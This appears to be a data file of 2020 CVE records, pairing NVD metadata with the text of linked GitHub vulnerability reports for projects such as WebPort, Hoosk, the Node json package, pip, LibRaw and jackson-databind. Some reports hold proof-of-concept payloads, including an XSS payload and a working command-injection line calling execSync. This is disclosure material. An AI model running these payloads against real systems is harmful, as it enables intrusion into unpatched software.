2020-08-12T05:23:33Z
2020-08-27T10:16:25Z
https://github.com/mz-automation/libiec61850/issues/250
677,394,865
250
1,409
CVE-2020-23659
2020-08-26T18:15:10.427
WebPort-v1.19.17121 is affected by Cross Site Scripting (XSS) on the "connections" feature.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/r0ck3t1973/xss_payload/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gi...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:webport:web_port:1.19.17121:*:*:*:*:*:*:*", "matchCriteriaId": "B90234D9-7BEB-4185-88B9-6CB1CF4A9E8C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStart...
[ "79" ]
79
https://github.com/r0ck3t1973/xss_payload/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "r0ck3t1973", "xss_payload" ]
**Describe the bug** An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "connections" feature. **To Reproduce** Steps to reproduce the behavior: 1, Login into the panel 2. Go to '/access/setup?type=conn' 3. Change connections 4. Insert Payload: '><details/open/onto...
Cross Site Script Vulnerability on "connections" in WebPort-v1.19.17121
https://api.github.com/repos/r0ck3t1973/xss_payload/issues/1/comments
0
2020-06-23T03:11:09Z
2020-09-01T08:47:37Z
https://github.com/r0ck3t1973/xss_payload/issues/1
643,495,077
1
1,410
CVE-2020-16610
2020-08-28T17:15:12.043
Hoosk Codeigniter CMS before 1.7.2 is affected by a Cross Site Request Forgery (CSRF). When an attacker induces authenticated admin user to a malicious web page, any accounts can be deleted without admin user's intention.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/havok89/Hoosk/issues/53" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hoosk:hoosk:*:*:*:*:*:*:*:*", "matchCriteriaId": "B8C02AC7-3B66-4B8A-BEBA-40E9E1CB97FA", "versionEndExcluding": "1.7.2", "versionEndIncluding": null, "versionStartExcluding":...
[ "352" ]
352
https://github.com/havok89/Hoosk/issues/53
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "havok89", "Hoosk" ]
Hi,bro.I also find an csrf issue in admin page. When attacker induce authenticated admin user to a malicious web page, any accounts can be deleted without admin user's intention. how to reproduce the issue. 1. Login to admin page.(/admin) 2. Keep login and access the html it has following content ```html ...
CSRF issue that allows attacker to delete an account
https://api.github.com/repos/havok89/Hoosk/issues/53/comments
2
2020-04-12T01:21:37Z
2020-05-08T04:19:22Z
https://github.com/havok89/Hoosk/issues/53
598,385,822
53
1,411
CVE-2020-7712
2020-08-30T08:15:11.900
This affects the package json before 10.0.0. It is possible to inject arbritary commands using the parseLookup function.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTI...
[ { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/trentm/json/issues/144" }, { "source": "report@snyk.io", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/trentm/json/pull/145" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:joyent:json:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "E0DD27F0-787A-4CF4-84E6-2821C3101875", "versionEndExcluding": "10.0.0", "versionEndIncluding": null, "versionStartExcl...
[ "78" ]
78
https://github.com/trentm/json/issues/144
[ "Exploit", "Third Party Advisory" ]
github.com
[ "trentm", "json" ]
## POC ```js const json = require('json'); res = json.parseLookup('{[this.constructor.constructor("return process")().mainModule.require("child_process").execSync("id").toString()]:1}'); console.log(res); ```
Command Injection
https://api.github.com/repos/trentm/json/issues/144/comments
2
2020-08-06T07:10:51Z
2020-08-28T22:52:35Z
https://github.com/trentm/json/issues/144
674,077,621
144
1,413
CVE-2020-23836
2020-09-01T17:15:12.230
A Cross-Site Request Forgery (CSRF) vulnerability in edit_user.php in OSWAPP Warehouse Inventory System (aka OSWA-INV) through 2020-08-10 allows remote attackers to change the admin's password after an authenticated admin visits a third-party site.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/siamon123/warehouse-inventory-system/issues/55" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://www.exploit-db.com/exploits...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oswapp:warehouse_inventory_system:*:*:*:*:*:*:*:*", "matchCriteriaId": "21BCA31C-3CA2-4A59-AA14-7F08F7A999CD", "versionEndExcluding": null, "versionEndIncluding": "2020-08-10", ...
[ "352" ]
352
https://github.com/siamon123/warehouse-inventory-system/issues/55
[ "Third Party Advisory" ]
github.com
[ "siamon123", "warehouse-inventory-system" ]
Cross-Site Request Forgery (CSRF) on `edit_user.php` page allows changing the admin password from a 3rd party site. For fix see: https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html
CSRF Change Admin Password
https://api.github.com/repos/siamon123/warehouse-inventory-system/issues/55/comments
0
2020-08-10T05:11:52Z
2020-08-10T05:11:52Z
https://github.com/siamon123/warehouse-inventory-system/issues/55
675,867,337
55
1,414
CVE-2020-23839
2020-09-01T17:15:12.310
A Reflected Cross-Site Scripting (XSS) vulnerability in GetSimple CMS v3.3.16, in the admin/index.php login portal webpage, allows remote attackers to execute JavaScript code in the client's browser and harvest login credentials after a client clicks a link, enters credentials, and submits the login form.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/162016/GetSimple-CMS-3.3.16-Cross-Site-Scripting-Shell-Upload.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisor...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:get-simple:getsimple_cms:3.3.16:*:*:*:*:*:*:*", "matchCriteriaId": "30554CDA-8A09-4632-8857-0CA48F3B2B3E", "versionEndExcluding": null, "versionEndIncluding": null, "versionS...
[ "79" ]
79
https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1330
[ "Exploit", "Third Party Advisory" ]
github.com
[ "GetSimpleCMS", "GetSimpleCMS" ]
Reflected Cross-Site Scripting (XSS) vulnerability in GetSimple CMS v3.3.16 in 'admin/index.php' login portal webpage allows remote attackers to execute JavaScript code in the clients browser & harvest login credentials via client clicking a link, entering credentials, and submitting login form.
Reflected Cross-Site Scripting (XSS) vulnerability in GetSimple CMS v3.3.16 in 'admin/index.php'
https://api.github.com/repos/GetSimpleCMS/GetSimpleCMS/issues/1330/comments
9
2020-08-12T20:38:56Z
2021-01-20T20:35:15Z
https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1330
677,963,854
1,330
1,415
CVE-2020-23814
2020-09-03T17:15:11.097
Multiple cross-site scripting (XSS) vulnerabilities in xxl-job v2.2.0 allow remote attackers to inject arbitrary web script or HTML via (1) AppName and (2)AddressList parameter in JobGroupController.java file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/xuxueli/xxl-job/issues/1866" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.ccsq8.com/issues.html" }, { "sourc...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:xuxueli:xxl-job:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "C7AE69F1-6781-47B8-933D-989F4EF5ED19", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "79" ]
79
https://github.com/xuxueli/xxl-job/issues/1866
[ "Exploit", "Third Party Advisory" ]
github.com
[ "xuxueli", "xxl-job" ]
Locate the executor management function: https://github.com/xuxueli/xxl-job/blob/289f02185b952f4652a4a7daf4ac3c6384f338bc/xxl-job-admin/src/main/java/com/xxl/job/admin/controller/JobGroupController.java insert POC there has front-end validation,By code audit, I find that the back end only has length validation.Can be...
v2.2.0 Stored XSS vulnerabilities
https://api.github.com/repos/xuxueli/xxl-job/issues/1866/comments
5
2020-07-30T09:30:54Z
2021-02-16T15:18:29Z
https://github.com/xuxueli/xxl-job/issues/1866
668,541,948
1,866
1,416
CVE-2019-20916
2020-09-04T20:15:11.013
The pip package before 19.2 for Python allows Directory Traversal when a URL is given in an install command, because a Content-Disposition header can have ../ in a filename, as demonstrated by overwriting the /root/.ssh/authorized_keys file. This occurs in _download_http_url in _internal/download.py.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00005.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pypa:pip:*:*:*:*:*:*:*:*", "matchCriteriaId": "903FF43B-79F2-4F2A-BC24-12D52398B309", "versionEndExcluding": "19.2", "versionEndIncluding": null, "versionStartExcluding": nul...
[ "22" ]
22
https://github.com/pypa/pip/issues/6413
[ "Exploit", "Patch" ]
github.com
[ "pypa", "pip" ]
**Environment** * pip version: pip 19.0.3 * Python version: Python 2.7.15 / Python 2.7.15 * OS: Ubuntu 16.04 / Windows 10 **Description** This is a security vulnerability. when installing a remote package via a specified URL "pip install \<url\>", A malicious server (or a network MitM if downloading over ...
pip install <url> allow directory traversal, leading to arbitrary file write
https://api.github.com/repos/pypa/pip/issues/6413/comments
1
2019-04-16T17:23:55Z
2019-07-11T08:57:21Z
https://github.com/pypa/pip/issues/6413
433,898,163
6,413
1,417
CVE-2020-24566
2020-09-09T16:15:11.923
In Octopus Deploy 2020.3.x before 2020.3.4 and 2020.4.x before 2020.4.1, if an authenticated user creates a deployment or runbook process using Azure steps and sets the step's execution location to run on the server/worker, then (under certain circumstances) the account password is exposed in cleartext in the verbose t...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/6563" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/6564" }, { ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:octopus:octopus_deploy:*:*:*:*:*:*:*:*", "matchCriteriaId": "BBE2EA3F-968A-4528-A3C3-0FE92A4DB9DE", "versionEndExcluding": "2020.3.4", "versionEndIncluding": null, "versionSt...
[ "532" ]
532
https://github.com/OctopusDeploy/Issues/issues/6563
[ "Third Party Advisory" ]
github.com
[ "OctopusDeploy", "Issues" ]
## Description <!-- Take the time to figure out a description for disclosure which gives customers enough detail to understand if they will be affected or not, without disclosing how to exploit the vulnerability to bad actors. --> A regression was introduced that caused certain passwords to be written to the depl...
Passwords written to deployment log in plain-text
https://api.github.com/repos/OctopusDeploy/Issues/issues/6563/comments
1
2020-09-08T03:28:35Z
2020-09-10T06:08:43Z
https://github.com/OctopusDeploy/Issues/issues/6563
695,516,197
6,563
1,418
CVE-2020-24566
2020-09-09T16:15:11.923
In Octopus Deploy 2020.3.x before 2020.3.4 and 2020.4.x before 2020.4.1, if an authenticated user creates a deployment or runbook process using Azure steps and sets the step's execution location to run on the server/worker, then (under certain circumstances) the account password is exposed in cleartext in the verbose t...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/6563" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/6564" }, { ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:octopus:octopus_deploy:*:*:*:*:*:*:*:*", "matchCriteriaId": "BBE2EA3F-968A-4528-A3C3-0FE92A4DB9DE", "versionEndExcluding": "2020.3.4", "versionEndIncluding": null, "versionSt...
[ "532" ]
532
https://github.com/OctopusDeploy/Issues/issues/6564
[ "Third Party Advisory" ]
github.com
[ "OctopusDeploy", "Issues" ]
#6563 also affected `2020.3`. The fix has been shipped in the patch indicated by the milestone. If you are using `2020.3` we highly recommend applying this patch. Learn about [Releases of Octopus Deploy Server](https://g.octopushq.com/longtermsupport).
Passwords written to deployment log in plain-text
https://api.github.com/repos/OctopusDeploy/Issues/issues/6564/comments
1
2020-09-08T03:44:23Z
2020-09-10T06:08:53Z
https://github.com/OctopusDeploy/Issues/issues/6564
695,521,561
6,564
1,419
CVE-2020-25219
2020-09-09T21:15:11.117
url::recvline in url.cpp in libproxy 0.4.x through 0.4.15 allows a remote HTTP server to trigger uncontrolled recursion via a response composed of an infinite stream that lacks a newline character. This leads to stack exhaustion.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00030.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libproxy_project:libproxy:*:*:*:*:*:*:*:*", "matchCriteriaId": "52AFAA1F-0DF9-41AD-BD7B-0A3B87679898", "versionEndExcluding": null, "versionEndIncluding": "0.4.15", "versionS...
[ "674" ]
674
https://github.com/libproxy/libproxy/issues/134
[ "Exploit", "Third Party Advisory" ]
github.com
[ "libproxy", "libproxy" ]
I found this in url.cpp: ``` static inline string recvline(int fd) { // Read a character. // If we don't get a character, return empty string. // If we are at the end of the line, return empty string. char c = '\0'; if (recv(fd, &c, 1, 0) != 1 || c == '\n') return ""; return string(1, c) + recvl...
(CVE-2020-25219) pac server can trigger unbounded recursion in url.cpp recvline()
https://api.github.com/repos/libproxy/libproxy/issues/134/comments
1
2020-09-07T17:47:52Z
2020-09-10T12:22:38Z
https://github.com/libproxy/libproxy/issues/134
695,310,556
134
1,420
CVE-2020-24164
2020-09-11T06:15:11.903
A deserialization flaw is present in Taoensso Nippy before 2.14.2. In some circumstances, it is possible for an attacker to create a malicious payload that, when deserialized, will allow arbitrary code to be executed. This occurs because there is automatic use of the Java Serializable interface.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ptaoussanis/nippy/issues/130" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ptaoussanis/nippy/issues/130...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:taoensso:nippy:*:*:*:*:*:*:*:*", "matchCriteriaId": "7F0B82F0-2B55-4EAF-98CB-208211CE99EB", "versionEndExcluding": "2.14.2", "versionEndIncluding": null, "versionStartExcludi...
[ "502" ]
502
https://github.com/ptaoussanis/nippy/issues/130
[ "Third Party Advisory" ]
github.com
[ "ptaoussanis", "nippy" ]
# SECURITY ADVISORY [CVE-2020-24164] > This vulnerability kindly pointed out in an _excellent_ report by @solita-timo-mihaljov. _Huge_ thanks to Timo! ## Quick summary - Nippy versions from `v2.5.0-beta1` (24 Oct 2013) and before `v2.15.0 final` (24 Jul 2020) contain an RCE (Remote Code Execution) vulnerabilit...
[CVE-2020-24164] Remote Code Execution (RCE) vulnerability via Java's Serializable interface
https://api.github.com/repos/taoensso/nippy/issues/130/comments
5
2020-07-24T15:47:42Z
2022-02-01T11:25:58Z
https://github.com/taoensso/nippy/issues/130
665,257,168
130
1,421
CVE-2020-14330
2020-09-11T18:15:13.147
An Improper Output Neutralization for Logs flaw was found in Ansible when using the uri module, where sensitive data is exposed to content and json output. This flaw allows an attacker to access the logs or outputs of performed tasks to read keys used in playbooks from other users within the uri module. The highest thr...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 2.1, "confidentialityImpact": "PARTIAL", ...
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-14330" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ],...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:ansible_engine:*:*:*:*:*:*:*:*", "matchCriteriaId": "4AA51D54-94D6-4A3C-AD5B-190C68C5C5AE", "versionEndExcluding": "2.9.12", "versionEndIncluding": null, "versionStart...
[ "532" ]
532
https://github.com/ansible/ansible/issues/68400
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ansible", "ansible" ]
##### SUMMARY uri module set string with masked content into content and json output ##### ISSUE TYPE - Bug Report ##### COMPONENT NAME uri ##### ANSIBLE VERSION <!--- Paste verbatim output from "ansible --version" between quotes --> ```paste below ansible 2.9.0 config file = None configured module...
uri module set string with masked content into content and json output
https://api.github.com/repos/ansible/ansible/issues/68400/comments
12
2020-03-23T11:01:05Z
2020-06-18T13:00:08Z
https://github.com/ansible/ansible/issues/68400
586,120,912
68,400
1,422
CVE-2020-25540
2020-09-14T13:15:10.220
ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthorized attacker can read arbitrarily file on a remote server via GET request encode parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "http://packetstormsecurity.com/files/159177/ThinkAdmin-6-Arbitrary-File-Read.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:thinkadmin:thinkadmin:6.0:*:*:*:*:*:*:*", "matchCriteriaId": "0E149B70-8FFA-469F-B90C-C3AE185F1658", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartEx...
[ "22" ]
22
https://github.com/zoujingli/ThinkAdmin/issues/244
[ "Exploit", "Third Party Advisory" ]
github.com
[ "zoujingli", "ThinkAdmin" ]
# ThinkAdmin v6 列目录/任意文件读取 `app/admin/controller/api/Update.php`存在3个function,都是不用登录认证就可以使用的,引用列表如下: ```php namespace app\admin\controller\api; use think\admin\Controller; use think\admin\service\InstallService; use think\admin\service\ModuleService; ``` `version()`可以获取到当前版本:`2020.08.03.01`,≤这个版本的都有可能存在漏...
ThinkAdmin v6 未授权列目录/任意文件读取
https://api.github.com/repos/zoujingli/ThinkAdmin/issues/244/comments
6
2020-08-27T08:28:52Z
2023-10-11T07:02:59Z
https://github.com/zoujingli/ThinkAdmin/issues/244
687,050,255
244
1,423
CVE-2020-25575
2020-09-14T19:15:11.397
An issue was discovered in the failure crate through 0.1.5 for Rust. It may introduce "compatibility hazards" in some applications, and has a type confusion flaw when downcasting. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: This may overlap CVE-2019-25010
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://boats.gitlab.io/blog/post/failure-to-fehler/" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rust-lang-nurs...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:failure_project:failure:*:*:*:*:*:rust:*:*", "matchCriteriaId": "4F8070E9-5A83-40C4-9E25-8B1BD2ECA198", "versionEndExcluding": null, "versionEndIncluding": "0.1.8", "versionS...
[ "843" ]
843
https://github.com/rust-lang-nursery/failure/issues/336
[ "Patch", "Third Party Advisory" ]
github.com
[ "rust-lang-nursery", "failure" ]
I noticed that it is possible to cause type confusion in downcast by manually implementing `__private_get_type_id__`. https://play.rust-lang.org/?version=stable&mode=debug&edition=2018&gist=ad66fe439660eb8373996bfd6bd7a835 Although the name of the function clearly shows that it is a private API, I believe a safe ...
Memory safe violation by abusing `__private_get_type_id__`
https://api.github.com/repos/rust-lang-deprecated/failure/issues/336/comments
1
2019-11-13T21:37:22Z
2019-11-13T22:14:21Z
https://github.com/rust-lang-deprecated/failure/issues/336
522,487,156
336
1,425
CVE-2020-25453
2020-09-15T22:15:13.507
An issue was discovered in BlackCat CMS before 1.4. There is a CSRF vulnerability (bypass csrf_token) that allows remote arbitrary code execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/159237/BlackCat-CMS-1.3.6-Cross-Site-Request-Forgery.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:blackcat-cms:blackcat_cms:*:*:*:*:*:*:*:*", "matchCriteriaId": "5B574187-3443-4F7B-8C08-A3F44304A0F4", "versionEndExcluding": "1.4", "versionEndIncluding": null, "versionStar...
[ "352" ]
352
https://github.com/BlackCatDevelopment/BlackCatCMS/issues/389
[ "Exploit", "Third Party Advisory" ]
github.com
[ "BlackCatDevelopment", "BlackCatCMS" ]
CSRF Bypass v1.3.6
https://api.github.com/repos/BlackCatDevelopment/BlackCatCMS/issues/389/comments
18
2020-05-30T21:28:59Z
2020-09-01T11:28:39Z
https://github.com/BlackCatDevelopment/BlackCatCMS/issues/389
627,825,969
389
1,426
CVE-2020-24889
2020-09-16T15:15:12.527
A buffer overflow vulnerability in LibRaw version < 20.0 LibRaw::GetNormalizedModel in src/metadata/normalize_model.cpp may lead to context-dependent arbitrary code execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.1, "confidentialityImpact": "PARTIA...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibRaw/LibRaw/issues/334" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libraw:libraw:*:*:*:*:*:*:*:*", "matchCriteriaId": "290732D9-D09E-4149-AD2C-DCF404A1B24B", "versionEndExcluding": "0.20.0", "versionEndIncluding": null, "versionStartExcludin...
[ "120" ]
120
https://github.com/LibRaw/LibRaw/issues/334
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibRaw", "LibRaw" ]
Reproduce steps: 1. compile provided test.c 2. run command:``./test poc`` Stack trace: ``` #0 __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:51 #1 0x00007ffff6fb08b1 in __GI_abort () at abort.c:79 #2 0x00007ffff6ff9907 in __libc_message (action=action@entry=(do_abort | do_backtrace), ...
buffer overflow
https://api.github.com/repos/LibRaw/LibRaw/issues/334/comments
4
2020-08-20T11:30:55Z
2020-09-24T15:18:58Z
https://github.com/LibRaw/LibRaw/issues/334
682,640,677
334
1,427
CVE-2020-24890
2020-09-16T15:15:12.603
libraw 20.0 has a null pointer dereference vulnerability in parse_tiff_ifd in src/metadata/tiff.cpp, which may result in context-dependent arbitrary code execution. Note: this vulnerability occurs only if you compile the software in a certain way
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 2.6, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibRaw/LibRaw/issues/335" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libraw:libraw:0.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "3D26C9C4-BD7A-454F-96B3-06D1EFC4A5C2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludi...
[ "476" ]
476
https://github.com/LibRaw/LibRaw/issues/335
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibRaw", "LibRaw" ]
Reproduce steps: 1. compile provided test.c 2. run command:``./test poc`` Stack trace: ``` #0 0x00007ffff7afdcc7 in LibRaw::parse_tiff_ifd (this=this@entry=0x7ffffff43250, base=<optimized out>, base@entry=0x0) at src/metadata/tiff.cpp:617 #1 0x00007ffff7ae7d96 in LibRaw::parse_tiff (this=this@entry=0x7ff...
segmentation fault in LibRaw::parse_tiff_ifd
https://api.github.com/repos/LibRaw/LibRaw/issues/335/comments
5
2020-08-20T12:18:12Z
2021-10-29T11:05:28Z
https://github.com/LibRaw/LibRaw/issues/335
682,668,248
335
1,428
CVE-2020-24750
2020-09-17T19:15:13.580
FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to com.pastdev.httpcomponents.configuration.JndiConfiguration.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/commit/ad5a630174f08d279504bc51ebba8772fd71b86b" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "4892ABAA-57A0-43D3-965C-2D7F4A8A6024", "versionEndExcluding": "2.6.7.5", "versionEndIncluding": null, "versio...
[ "502" ]
502
https://github.com/FasterXML/jackson-databind/issues/2798
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "FasterXML", "jackson-databind" ]
Another gadget type(s) reported regarding class(es) of `com.pastdev.httpcomponents:configuration`. library. See https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062 for description of the general problem. Mitre id: CVE-2020-24750 Reporter(s): Al1ex@knownsec Fix ...
Block one more gadget type (com.pastdev.httpcomponents, CVE-2020-24750)
